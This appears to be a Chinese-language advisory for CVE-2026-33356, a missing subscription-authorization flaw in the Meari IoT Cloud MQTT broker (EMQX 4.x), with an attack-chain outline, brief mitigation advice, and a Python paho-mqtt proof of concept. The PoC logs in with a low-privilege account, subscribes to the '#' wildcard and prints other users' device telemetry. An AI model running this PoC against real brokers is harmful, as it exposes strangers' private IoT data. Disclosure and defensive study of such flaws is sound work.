CVE-2026-33356 Meari IoT MQTT权限绕过漏洞

漏洞信息

漏洞编号

CVE-2026-33356

漏洞类型

权限绕过

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Meari IoT Cloud MQTT Broker (EMQX 4.x)

漏洞概述

Meari IoT Cloud MQTT Broker在部署EMQX 4.x时存在权限绕过漏洞。由于Broker仅强制执行发布限制，而未在设备级别强制实施订阅授权，任何经过身份验证的低权限账户均可订阅全局通配符主题。这使得攻击者能够接收并窃取其不拥有的设备遥测数据，造成严重的信息泄露风险。该漏洞CVSS评分为7.7，属于高危漏洞，且利用无需用户交互。

技术细节

该漏洞根因在于Meari IoT Cloud使用的EMQX 4.x Broker配置了不完整的访问控制列表（ACL）。系统虽然实施了发布权限的限制，防止用户向非授权设备发送控制指令，但未能对订阅操作进行同等严格的设备级鉴权。在MQTT协议机制中，主题支持通配符订阅，攻击者利用这一特性，使用仅需低权限认证的账户连接Broker，并发送订阅全局通配符主题（如`#`或特定前缀/#）的请求。由于Broker在处理订阅请求时未校验用户与目标设备的归属关系，它会将所有匹配该通配符的消息流（包括其他用户的设备遥测数据、状态信息等）推送给攻击者。这种利用方式仅需网络访问权限和低特权账户，无需用户交互，即可导致大规模的敏感IoT数据泄露，严重破坏了系统的多租户数据隔离性。

攻击链分析

STEP 1

信息收集

攻击者确定目标Meari IoT Cloud MQTT Broker的地址和端口。

STEP 2

获取凭证

攻击者注册或获取一个合法的低权限账户凭证。

STEP 3

建立连接

攻击者使用低权限账户连接到MQTT Broker。

STEP 4

恶意订阅

攻击者发送SUBSCRIBE数据包，请求订阅全局通配符主题（如#）。

STEP 5

数据窃取

Broker由于缺乏订阅ACL校验，将所有设备的遥测数据推送给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import paho.mqtt.client as mqtt

# Configuration
BROKER_ADDRESS = "mqtt.meari.example.com"
PORT = 1883
USERNAME = "low_priv_user"
PASSWORD = "password123"

# Callback when message is received
def on_message(client, userdata, message):
    print(f"Topic: {message.topic}\nMessage: {message.payload.decode()}")

# Initialize client
client = mqtt.Client("AttackerClient")
client.username_pw_set(USERNAME, PASSWORD)
client.on_message = on_message

# Connect to broker
print("Connecting to broker...")
client.connect(BROKER_ADDRESS, PORT)

# Start loop
client.loop_start()

# Subscribe to global wildcard to capture all telemetry
# This exploits the missing subscribe authorization
print("Subscribing to wildcard topic '#'")
client.subscribe("#", qos=0)

try:
    while True:
        pass
except KeyboardInterrupt:
    client.loop_stop()
    client.disconnect()

影响范围

Meari IoT Cloud MQTT Broker (EMQX 4.x)

防御指南

临时缓解措施

在未升级补丁前，建议通过网络隔离手段限制MQTT Broker的访问来源，或在EMQX配置中临时禁用通配符订阅功能，通过白名单机制严格控制允许订阅的主题前缀。